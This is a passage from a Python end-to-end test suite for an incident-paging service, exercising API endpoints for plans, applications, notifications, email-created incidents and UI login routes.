re = requests.get(base_url + 'templates?name=test_template&creator=%s&active=0' % sample_user)
assert re.status_code == 200
data = re.json()
assert len(data) >= 1
re = requests.get(base_url + 'templates?limit=1&name=test_template&creator=%s&active=0' % sample_user)
assert re.status_code == 200
data = re.json()
assert len(data) == 1
re = requests.post(base_url + 'templates/%d' % template_id, json={'active': 1})
assert re.status_code == 200
re = requests.get(base_url + 'templates?name=test_template&creator=%s&active=1' % sample_user)
assert re.status_code == 200
data = re.json()
assert len(data) == 1
def test_get_targets(sample_user, sample_user2, sample_team, sample_team2):
re = requests.get(base_url + 'targets')
assert re.status_code == 200
assert sample_user in re.json()
re = requests.get(base_url + 'targets/team')
assert re.status_code == 200
assert sample_team in re.json()
re = requests.get(base_url + 'targets/team?startswith=' + sample_team[:3])
data = re.json()
assert re.status_code == 200
assert sample_team in data
assert sample_team2 not in data
re = requests.get(base_url + 'targets/user?startswith=' + sample_user[:3])
data = re.json()
assert re.status_code == 200
assert sample_user in data
assert sample_user2 not in data
@pytest.mark.skip(reason="reanble this test when we can programatically create noc user in the test")
def test_post_plan_noc(sample_user, sample_team, sample_application_name):
data = {
'creator': sample_user,
'name': sample_user + '-test-foo',
'description': 'Test plan for e2e test',
'threshold_window': 900,
'threshold_count': 10,
'aggregation_window': 300,
'aggregation_reset': 300,
'steps': [],
'isValid': True
}
invalid_steps = [
[
[
{
'role': 'user',
'target': 'noc',
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
[
{
'role': 'oncall-primary',
'target': sample_team,
'priority': 'high',
'wait': 300,
'repeat': 1,
'template': sample_application_name
},
]
],
[
[
{
'role': 'user',
'target': 'noc',
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
},
]
],
]
valid_steps = [
[
[
{
'role': 'user',
'target': sample_user,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
],
[
[
{
'role': 'user',
'target': sample_user,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
[
{
'role': 'manager',
'target': sample_team,
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
[
{
'role': 'user',
'target': 'noc',
'priority': 'low',
'wait': 600,
'repeat': 0,
'template': sample_application_name
}
],
],
]
for steps in invalid_steps:
_data = copy.deepcopy(data)
_data['steps'] = steps
re = requests.post(base_url + 'plans', json=_data)
assert re.status_code == 400
for steps in valid_steps:
_data = copy.deepcopy(data)
_data['steps'] = steps
re = requests.post(base_url + 'plans', json=_data)
assert re.status_code == 201
def test_get_applications(sample_application_name):
app_keys = set(['variables', 'required_variables', 'name', 'context_template', 'summary_template', 'sample_context', 'default_modes', 'supported_modes', 'owners'])
# TODO: insert application data before get
re = requests.get(base_url + 'applications/' + sample_application_name)
assert re.status_code == 200
app = re.json()
assert isinstance(app, dict)
assert set(app.keys()) == app_keys
re = requests.get(base_url + 'applications')
assert re.status_code == 200
apps = re.json()
assert isinstance(apps, list)
assert len(apps) > 0
for app in apps:
assert set(app.keys()) == app_keys
def test_update_reprioritization_settings(sample_user):
session = requests.Session()
session.headers = username_header(sample_user)
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': '120'})
assert re.status_code == 200
re = session.get(base_url + 'users/reprioritization/' + sample_user)
assert re.status_code == 200
rules = re.json()
assert len(rules) == 1
rule = rules[0]
assert rule['src_mode'] == 'call'
assert rule['dst_mode'] == 'sms'
assert rule['count'] == 1
assert rule['duration'] == 120
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'fakesrc', 'dst_mode': 'sms', 'count': '1', 'duration': '120'})
assert re.json()['title'] == 'Invalid source mode.'
assert re.status_code == 400
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'fakedst', 'count': '1', 'duration': '120'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid destination mode.'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'missingargs': 'foo'})
assert re.status_code == 400
assert re.json()['title'] == 'Missing argument'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': '1'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid duration'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': '3601'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid duration'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': 'fakeint'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid duration'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': 'fakeint', 'duration': '3600'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid count'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '-10', 'duration': '3600'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid count'
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '300', 'duration': '3600'})
assert re.status_code == 400
assert re.json()['title'] == 'Invalid count'
def test_delete_reprioritization_settings(sample_user):
session = requests.Session()
session.headers = username_header(sample_user)
re = session.post(base_url + 'users/reprioritization/' + sample_user,
json={'src_mode': 'call', 'dst_mode': 'sms', 'count': '1', 'duration': '120'})
assert re.status_code == 200
re = session.get(base_url + 'users/reprioritization/' + sample_user)
assert re.status_code == 200
assert 'call' in set(rule['src_mode'] for rule in re.json())
re = session.delete(base_url + 'users/reprioritization/%s/call' % sample_user)
assert re.status_code == 200
re = session.get(base_url + 'users/reprioritization/' + sample_user)
assert re.status_code == 200
assert 'call' not in set(rule['src_mode'] for rule in re.json())
re = session.delete(base_url + 'users/reprioritization/%s/call' % sample_user)
assert re.status_code == 404
def test_get_modes():
re = requests.get(base_url + 'modes')
assert re.status_code == 200
data = re.json()
assert 'sms' in data
assert 'email' in data
assert 'call' in data
assert 'im' in data
assert 'drop' not in data
def test_get_target_roles():
re = requests.get(base_url + 'target_roles')
assert re.status_code == 200
data = re.json()
expected_set = set(['oncall-primary', 'manager', 'team', 'user', 'oncall-secondary'])
assert expected_set <= set([r['name'] for r in data])
def test_get_priorities():
re = requests.get(base_url + 'priorities')
assert re.status_code == 200
data = re.json()
data = set([d['name'] for d in data])
assert 'low' in data
assert 'medium' in data
assert 'high' in data
assert 'urgent' in data
def test_get_user(sample_user, sample_email, sample_admin_user):
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user))
assert re.status_code == 200
data = re.json()
assert data.viewkeys() == {'teams', 'modes', 'per_app_modes', 'admin', 'contacts', 'name'}
assert data['contacts']['email'] == sample_email
assert data['name'] == sample_user
re = requests.get(base_url + 'users/' + sample_admin_user, headers=username_header(sample_admin_user))
assert re.status_code == 200
assert re.json()['admin'] is True
def test_healthcheck():
with open('/tmp/status', 'w') as f:
f.write('GOOD')
re = requests.get(server + 'healthcheck')
assert re.status_code == 200
assert re.content == 'GOOD'
def test_stats():
re = requests.get(base_url + 'stats')
assert re.status_code == 200
data = re.json()
for key in ('total_active_users', 'total_messages_sent_today', 'total_incidents_today', 'total_messages_sent',
'total_incidents', 'total_plans', 'pct_incidents_claimed_last_month', 'median_seconds_to_claim_last_month'):
assert key in data
assert data[key] is None or isinstance(data[key], int) or isinstance(data[key], float)
re = requests.get(base_url + 'stats?fields=total_active_users&fields=total_plans')
assert re.status_code == 200
assert re.json().viewkeys() == {'total_active_users', 'total_plans'}
re = requests.get(base_url + 'stats?fields=fakefield')
assert re.status_code == 200
assert re.json() == {}
def test_app_stats(sample_application_name):
re = requests.get(base_url + 'applications/sfsdf232423fakeappname/stats')
assert re.status_code == 404
re = requests.get(base_url + 'applications/%s/stats' % sample_application_name)
assert re.status_code == 200
data = re.json()
for key in ('total_incidents_today', 'total_messages_sent_today',
'pct_incidents_claimed_last_month', 'median_seconds_to_claim_last_month',
'total_incidents_last_month', 'total_messages_sent_last_month',
'pct_call_fail_last_month', 'pct_call_success_last_month', 'pct_call_other_last_month',
'pct_sms_fail_last_month', 'pct_sms_success_last_month', 'pct_sms_other_last_month',
'pct_email_fail_last_month', 'pct_email_success_last_month', 'pct_email_other_last_month'):
assert data[key] is None or isinstance(data[key], int) or isinstance(data[key], float)
def test_post_notification(sample_user, sample_application_name):
# The iris-api in this case will send a request to iris-sender's
# rpc endpoint. Don't bother if sender isn't working.
try:
sock = socket.socket()
sock.connect(sender_address)
sock.close()
except socket.error:
pytest.skip('Skipping this test as sender is not running/reachable.')
re = requests.post(base_url + 'notifications', json={})
assert re.status_code == 400
assert 'Missing required atrributes' in re.text
re = requests.post(base_url + 'notifications', json={
'role': 'user',
'target': sample_user,
'subject': 'test',
})
assert re.status_code == 400
assert 'Both priority and mode are missing' in re.text
re = requests.post(base_url + 'notifications', json={
'role': 'user',
'target': sample_user,
'subject': 'test',
'priority': 'fakepriority'
})
assert re.status_code == 400
assert 'Invalid priority' in re.text
re = requests.post(base_url + 'notifications', json={
'role': 'user',
'target': sample_user,
'subject': 'test',
'mode': 'fakemode'
})
assert re.status_code == 400
assert 'Invalid mode' in re.text
re = requests.post(base_url + 'notifications', json={
'role': 'user',
'target': sample_user,
'subject': 'test',
'priority': 'low'
}, headers={'authorization': 'hmac %s:boop' % sample_application_name})
assert re.status_code == 200
assert re.text == '[]'
def test_modify_applicaton_quota(sample_application_name, sample_admin_user, sample_plan_name):
if not all([sample_application_name, sample_admin_user, sample_plan_name]):
pytest.skip('We do not have enough data in DB to do this test')
body = {
'hard_quota_threshold': 5,
'soft_quota_threshold': 3,
'hard_quota_duration': 60,
'soft_quota_duration': 60,
'plan_name': sample_plan_name,
'target_name': sample_admin_user,
'wait_time': 10
}
re = requests.post(base_url + 'applications/%s/quota' % sample_application_name, json=body, headers=username_header(sample_admin_user))
assert re.status_code == 201
re = requests.get(base_url + 'applications/%s/quota' % sample_application_name)
assert re.status_code == 200
data = re.json()
assert all(data[key] == body[key] for key in body)
body['hard_quota_duration'] = 66
body['soft_quota_duration'] = 65
re = requests.post(base_url + 'applications/%s/quota' % sample_application_name, json=body, headers=username_header(sample_admin_user))
assert re.status_code == 201
re = requests.get(base_url + 'applications/%s/quota' % sample_application_name)
assert re.status_code == 200
data = re.json()
assert all(data[key] == body[key] for key in body)
re = requests.delete(base_url + 'applications/%s/quota' % sample_application_name, headers=username_header(sample_admin_user))
assert re.status_code == 204
re = requests.get(base_url + 'applications/%s/quota' % sample_application_name)
assert re.status_code == 200
assert re.json() == {}
def test_modify_application(sample_application_name, sample_admin_user, sample_user, sample_mode, sample_priority):
if not all([sample_application_name, sample_admin_user, sample_user, sample_mode]):
pytest.skip('We do not have enough data in DB to do this test')
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
current_settings = re.json()
temp_test_variable = 'testvar2'
if temp_test_variable not in current_settings['variables']:
current_settings['variables'].append(temp_test_variable)
try:
json.loads(current_settings['sample_context'])
except ValueError:
current_settings['sample_context'] = '{}'
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
assert set(re.json()['variables']) == set(current_settings['variables'])
current_settings['variables'] = list(set(current_settings['variables']) - {temp_test_variable})
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
assert set(re.json()['variables']) == set(current_settings['variables'])
current_settings['sample_context'] = 'sdfdsf234234'
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'sample_context must be valid json'
# Take sample_user out of list of owners and set that
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
current_settings = re.json()
current_settings['owners'] = list(set(current_settings['owners']) - {sample_user})
assert sample_user not in current_settings['owners']
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Verify that user isn't there
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert sample_user not in re.json()['owners']
# add it back to the list of owners and ensure it's there
current_settings['owners'] = list(set(current_settings['owners']) | {sample_user})
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
current_settings = re.json()
assert sample_user in current_settings['owners']
# Same for mode
current_settings['supported_modes'] = list(set(current_settings['supported_modes']) - {sample_mode})
assert sample_mode not in current_settings['supported_modes']
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Verify that mode isn't there
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert sample_mode not in re.json()['supported_modes']
# Put it back and verify
current_settings['supported_modes'] = list(set(current_settings['supported_modes']) | {sample_mode})
assert sample_mode in current_settings['supported_modes']
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Verify that mode is there
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert sample_mode in re.json()['supported_modes']
# Same for default mode per priority per this app
# Wipe the default modes
current_settings['default_modes'] = {}
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Verify none are set
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.json()['default_modes'] == {}
# Set one
current_settings['default_modes'] = {sample_priority: sample_mode}
re = requests.put(base_url + 'applications/%s' % sample_application_name, json=current_settings, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Verify its set
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.json()['default_modes'] == {sample_priority: sample_mode}
assert re.status_code == 200
def test_create_application(sample_admin_user, sample_application_name):
if not all([sample_admin_user, sample_application_name]):
pytest.skip('We do not have enough data in DB to do this test')
re = requests.post(base_url + 'applications', json={'name': sample_application_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'This app already exists'
temp_app_name = 'e2e-temp-app'
# Ensure the app doesn't exist before we begin
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''DELETE FROM `application` WHERE `name` = %s''', temp_app_name)
conn.commit()
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % temp_app_name
re = requests.post(base_url + 'applications', json={'name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 201
assert re.json()['id']
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 200
# Ensure the random key got created correctly
re = requests.get(base_url + 'applications/%s/key' % temp_app_name, headers=username_header(sample_admin_user))
assert re.status_code == 200
assert len(re.json()['key']) == 64
# Kill the temp app
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''DELETE FROM `application` WHERE `name` = %s''', temp_app_name)
conn.commit()
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % temp_app_name
def test_rename_application(sample_admin_user, sample_application_name, sample_application_name2):
if not all([sample_admin_user, sample_application_name, sample_application_name2]):
pytest.skip('We do not have enough data in DB to do this test')
temp_app_name = 'e2e-rename-app'
# Test the sanity checks
re = requests.put(base_url + 'applications/%s/rename' % temp_app_name, json={'new_name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'New and old app name are identical'
re = requests.put(base_url + 'applications/fakeapp123/rename', json={'new_name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'No rows changed; old app name incorrect'
# Rename our sample app to the new temp name
re = requests.put(base_url + 'applications/%s/rename' % sample_application_name, json={'new_name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 200
# Ensure the old version doesn't exist anymore
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % sample_application_name
# Put it back now
re = requests.put(base_url + 'applications/%s/rename' % temp_app_name, json={'new_name': sample_application_name}, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s' % sample_application_name)
assert re.status_code == 200
# Ensure we can't rename over another app
re = requests.put(base_url + 'applications/%s/rename' % sample_application_name, json={'new_name': sample_application_name2}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'Destination app name likely already exists'
def test_delete_application(sample_admin_user):
if not sample_admin_user:
pytest.skip('We do not have enough data in DB to do this test')
temp_app_name = 'e2e-delete-app'
# Ensure we don't already have it
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''DELETE FROM `application` WHERE `name` = %s''', temp_app_name)
conn.commit()
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % temp_app_name
# Create application
re = requests.post(base_url + 'applications', json={'name': temp_app_name}, headers=username_header(sample_admin_user))
assert re.status_code == 201
assert re.json()['id']
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 200
# Delete it
re = requests.delete(base_url + 'applications/%s' % temp_app_name, headers=username_header(sample_admin_user))
assert re.status_code == 200
# Is it really gone?
re = requests.get(base_url + 'applications/%s' % temp_app_name)
assert re.status_code == 400
assert re.json()['title'] == 'Application %s not found' % temp_app_name
def test_view_app_key(sample_application_name, sample_admin_user):
re = requests.get(base_url + 'applications/%s/key' % sample_application_name)
assert re.status_code == 401
assert re.json()['title'] == 'You must be a logged in user to view this app\'s key'
re = requests.get(base_url + 'applications/fakeapp124324/key', headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'Key for this application not found'
re = requests.get(base_url + 'applications/%s/key' % sample_application_name, headers=username_header(sample_admin_user))
assert re.status_code == 200
assert re.json().viewkeys() == {'key'}
def test_twilio_delivery_update(fake_message_id):
if not fake_message_id:
pytest.skip('We do not have enough data in DB to do this test')
# Wouldn't surprise me if this is how twilio actually generates the SID on their end
message_sid = uuid.uuid4().hex
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''INSERT INTO `twilio_delivery_status` (`twilio_sid`, `message_id`)
VALUES (%s, %s)''', (message_sid, fake_message_id))
conn.commit()
re = requests.post(base_url + 'twilio/deliveryupdate', data={'MessageSid': message_sid, 'MessageStatus': 'delivered'})
assert re.status_code == 204
re = requests.get(base_url + 'messages/%s' % fake_message_id)
assert re.status_code == 200
assert re.json()['twilio_delivery_status'] == 'delivered'
def test_configure_email_incidents(sample_application_name, sample_application_name2, sample_plan_name, sample_email, sample_admin_user):
# Test wiping incident email addresses for an app
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name, json={}, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s/incident_emails' % sample_application_name)
assert re.status_code == 200
assert re.json() == {}
# Block trying to set a users email to create an incident
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name, json={sample_email: sample_plan_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'These email addresses are also user\'s email addresses which is not allowed: %s' % sample_email
special_email = '[email protected]'
# Test setting an email address + plan name combination for an app successfully
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name, json={special_email: sample_plan_name}, headers=username_header(sample_admin_user))
assert re.status_code == 200
re = requests.get(base_url + 'applications/%s/incident_emails' % sample_application_name)
assert re.status_code == 200
assert re.json()[special_email] == sample_plan_name
# Block one application stealing another application's email
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name2, json={special_email: sample_plan_name}, headers=username_header(sample_admin_user))
assert re.status_code == 400
assert re.json()['title'] == 'These email addresses are already in use by another app: %s' % special_email
def test_create_incident_by_email(sample_application_name, sample_plan_name, sample_admin_user):
if not sample_application_name or not sample_plan_name or not sample_email:
pytest.skip('We do not have enough data in DB to do this test')
special_email = '[email protected]'
# Ensure this email is configured properly.
re = requests.put(base_url + 'applications/%s/incident_emails' % sample_application_name, json={special_email: sample_plan_name}, headers=username_header(sample_admin_user))
assert re.status_code == 200
email_make_incident_payload = {
'body': 'This is a new test incident with a test message to be delivered to people.',
'headers': [
{'name': 'From', 'value': '[email protected]'},
{'name': 'To', 'value': special_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=email_make_incident_payload)
assert re.status_code == 204
assert re.headers['X-IRIS-INCIDENT'].isdigit()
re = requests.get(base_url + 'incidents/%s' % re.headers['X-IRIS-INCIDENT'])
assert re.status_code == 200
data = re.json()
assert data['context']['body'] == email_make_incident_payload['body']
assert data['context']['email'] == special_email
assert data['application'] == sample_application_name
assert data['plan'] == sample_plan_name
# Try it again with a customized fancy To header
email_make_incident_payload = {
'body': 'This is a new test incident with a test message to be delivered to people.',
'headers': [
{'name': 'From', 'value': '[email protected]'},
{'name': 'To', 'value': 'Email Mailing List Of Doom <%s>' % special_email},
{'name': 'Subject', 'value': 'fooject'},
]
}
re = requests.post(base_url + 'response/gmail', json=email_make_incident_payload)
assert re.status_code == 204
assert re.headers['X-IRIS-INCIDENT'].isdigit()
# Also try creating an incident with an an email that's a reply to the thread, which shouldn't work
email_make_incident_payload = {
'body': 'This string should not become an incident',
'headers': [
{'name': 'From', 'value': '[email protected]'},
{'name': 'To', 'value': special_email},
{'name': 'Subject', 'value': 'fooject'},
{'name': 'In-Reply-To', 'value': 'messagereference'},
]
}
re = requests.post(base_url + 'response/gmail', json=email_make_incident_payload)
assert re.status_code == 204
assert re.headers['X-IRIS-INCIDENT'] == 'Not created'
def test_ui_routes(sample_user, sample_admin_user):
# When not logged in, various pages redirect to login page
re = requests.get(ui_url + 'user', allow_redirects=False)
assert re.status_code == 302
assert re.headers['Location'] == '/login/?next=%2Fuser'
re = requests.get(ui_url + 'incidents', allow_redirects=False)
assert re.status_code == 302
assert re.headers['Location'] == '/login/?next=%2Fincidents'
re = requests.get(ui_url, allow_redirects=False)
assert re.status_code == 302
assert re.headers['Location'] == '/login/'
# And login page displays itself
re = requests.get(ui_url + 'login', allow_redirects=False)
assert re.status_code == 200
# And allows itself to work & login & set the beaker session cookie
re = requests.post(ui_url + 'login', allow_redirects=False, data={'username': sample_user, 'password': 'foo'})
assert re.status_code == 302
assert re.headers['Location'] == '/incidents'
assert 'iris-auth' in re.cookies
# Similarly it obeys the next GET param
re = requests.post(ui_url + 'login/?next=%2Fuser', allow_redirects=False, data={'username': sample_user, 'password': 'foo'})
assert re.status_code == 302
assert re.headers['Location'] == '/user'
assert 'iris-auth' in re.cookies
# When logged in, home page redirects to /incidents
re = requests.get(ui_url, allow_redirects=False, headers=username_header(sample_user))
assert re.status_code == 302
assert re.headers['Location'] == '/incidents'
# And other pages display themselves, and have the username specified in javascript
re = requests.get(ui_url + 'incidents', allow_redirects=False, headers=username_header(sample_user))
assert re.status_code == 200
assert re.headers['content-type'] == 'text/html'
assert ' appData.user = "%s";' % sample_user in re.text
# When passed an admin user, the admin flag should be "true"
re = requests.get(ui_url + 'incidents', allow_redirects=False, headers=username_header(sample_admin_user))
assert re.status_code == 200
assert re.headers['content-type'] == 'text/html'
assert ' appData.user = "%s";' % sample_admin_user in re.text
assert ' appData.user_admin = true;' in re.text
# And logout redirects to login page
re = requests.get(ui_url + 'logout', allow_redirects=False, headers=username_header(sample_user))
assert re.status_code == 302
assert re.headers['Location'] == '/login'
# And login redirects to home page
re = requests.get(ui_url + 'login', allow_redirects=False, headers=username_header(sample_user))
assert re.status_code == 302
assert re.headers['Location'] == '/incidents'
# Test actual login + logout session using beaker's cookies in requests session, rather than using the header trick:
session = requests.Session()
re = session.post(ui_url + 'login', allow_redirects=False, data={'username': sample_user, 'password': 'foo'})
assert re.status_code == 302
assert re.headers['Location'] == '/incidents'
assert 'iris-auth' in session.cookies
re = session.get(ui_url + 'incidents', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'text/html'
assert ' appData.user = "%s";' % sample_user in re.text
re = session.get(ui_url + 'logout', allow_redirects=False)
assert re.status_code == 302
assert re.headers['Location'] == '/login'
assert 'iris-auth' not in session.cookies
def test_ui_assets():
re = requests.get(ui_url + 'static/images/iris.png', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'image/png'
re = requests.get(ui_url + 'static/bundles/iris.css', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'text/css'
re = requests.get(ui_url + 'static/bundles/iris.js', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'text/javascript'
re = requests.get(ui_url + 'static/fonts/glyphicons-halflings-regular.woff', allow_redirects=False)
assert re.status_code == 200
assert re.headers['content-type'] == 'application/font-woff'
@pytest.mark.skip(reason="Re-enable this when we don't hard-code primary keys")
class TestDelete(object):
def setup_method(self, method):
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute("INSERT INTO template(`id`, `name`, `created`, `user_id`)"
"VALUES (1, 'foobar', '2015-09-25 22:54:31', 8)")
cursor.execute("INSERT INTO plan(`id`, `name`, `created`, `user_id`, `step_count`)"
"VALUES (2, 'foobar', '2015-09-25 22:54:31', 8, 3)")
cursor.execute("INSERT INTO plan_active (`name`, `plan_id`) VALUES ('foobar', 2)")
cursor.execute("INSERT INTO message(`id`, `created`, `application_id`, "
"`target_id`, `plan_id`, `priority_id`, `template_id`)"
"VALUES (1, '2015-09-25 22:54:31', 8, 8, 2, 8, 1)")
cursor.execute("INSERT INTO plan_notification(id, plan_id, step, template_id, target_id, role_id, priority_id)"
"VALUES (1, 2, 1, 1, 8, 8, 8)")
cursor.execute("INSERT INTO incident(`id`, `plan_id`, `created`, `application_id`, `current_step`, `active`)"
"VALUES (1, 2, '2015-09-25 22:54:31', 8, 1, 1)")
conn.commit()
def teardown_method(self, method):
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute("DELETE FROM plan_notification WHERE id = 1")
cursor.execute("DELETE FROM message WHERE id = 1")
cursor.execute("DELETE FROM incident WHERE id = 1")
cursor.execute("DELETE FROM plan_active WHERE plan_id = 2")
cursor.execute("DELETE FROM template WHERE id = 1")
cursor.execute("DELETE FROM plan WHERE id = 2")
conn.commit()
def test_delete_template(self):
# Test for correct error output
runner = CliRunner()
result = runner.invoke(iris_ctl.template, ['delete', 'foobar', '--config=../configs/config.dev.yaml'], input='y\n')
assert result.exit_code == 1
assert 'messages with ids:\n[1]' in result.output_bytes
assert 'plans with ids:\n[2]' in result.output_bytes
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
# Test failure with only message referencing template
cursor.execute("DELETE FROM plan_notification WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.template, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
assert result.exit_code == 1
# Test failure with only plan referencing template
cursor.execute("INSERT INTO plan_notification(id, plan_id, step, template_id, target_id, role_id, priority_id)"
"VALUES (1, 29, 1, 1, 8, 8, 8)")
cursor.execute("DELETE FROM message WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.template, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
assert result.exit_code == 1
# Test success
cursor.execute("DELETE FROM plan_notification WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.template, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
cursor.execute("SELECT id FROM template WHERE name = 'foobar'")
assert cursor.rowcount == 0
assert result.exit_code == 0
def test_delete_plan(self):
# Test for correct error output
runner = CliRunner()
result = runner.invoke(iris_ctl.plan, ['delete', 'foobar', '--config=../configs/config.dev.yaml'], input='y\n')
assert result.exit_code == 1
assert 'messages with ids:\n[1]' in result.output_bytes
assert 'incidents with ids:\n[1]' in result.output_bytes
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
# Test failure with only message referencing plan
cursor.execute("DELETE FROM incident WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.plan, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
assert result.exit_code == 1
# Test failure with only incident referencing plan
cursor.execute("INSERT INTO incident(`id`, `plan_id`, `created`, `application_id`, `current_step`, `active`)"
"VALUES (1, 2, '2015-09-25 22:54:31', 8, 1, 1)")
cursor.execute("DELETE FROM message WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.plan, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
assert result.exit_code == 1
# Test success
cursor.execute("DELETE FROM incident WHERE id = 1")
conn.commit()
result = runner.invoke(iris_ctl.plan, ['delete', 'foobar', '--config=../configs/config.dev.yaml'],
input='y\n')
cursor.execute("SELECT id FROM plan WHERE name = 'foobar'")
assert cursor.rowcount == 0
cursor.execute("SELECT plan_id FROM plan_active WHERE name ='foobar'")
assert cursor.rowcount == 0
cursor.execute("SELECT id FROM plan_notification WHERE plan_id = 2")
assert result.exit_code == 0
| bsd-2-clause | -1,747,274,331,694,743,600 | 37.60488 | 178 | 0.595624 | false |
derekjchow/models | research/brain_coder/common/rollout.py | 5 | 12091 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
